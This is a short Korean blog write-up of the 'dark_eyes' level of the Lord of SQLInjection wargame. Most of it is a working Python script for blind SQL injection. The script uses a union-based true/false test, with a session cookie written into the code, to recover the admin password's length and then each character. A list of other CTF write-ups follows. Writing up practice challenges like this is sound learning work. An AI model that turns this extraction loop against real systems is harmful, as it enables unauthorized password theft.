이 문제는 if문이 막혀있었다.
그래서 검색을 해보니 union으로 거짓일 경우와 참일 경우를 비교하는 방법을 찾아냈다.
이것을 이용해서 이전 문제와 비슷하게 풀어냈다.
import requests
url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}
'''
?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=8%20union%20select%201)--%20-
'''
length = 0
for i in range(1,100):
rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=" + str(i) + "%20union%20select%201)--%20-", headers=headers, cookies=cookies)
text = rs.text
if("query" in text):
print("find it length = " + str(i))
length = i
break
# get length
for i in range(1, length+1):
for c in range(33, 255):
rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20ord(substr(pw, " + str(i) + ",1))="+ str(c) +"%20union%20select%201)--%20-", headers=headers, cookies=cookies)
text = rs.text
if("query" in text):
print(str(i) + " find it " + str(c) + " " + chr(c))
break
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
| [picoCTF] A Simple Question (31) | 2018.10.18 |
|---|---|
| [LOS1] umaru (0) | 2018.09.27 |
| [LOS1] iron_golem (0) | 2018.09.27 |
| [LOS1] dragon (0) | 2018.09.22 |
| [LOS1] xavis (0) | 2018.09.22 |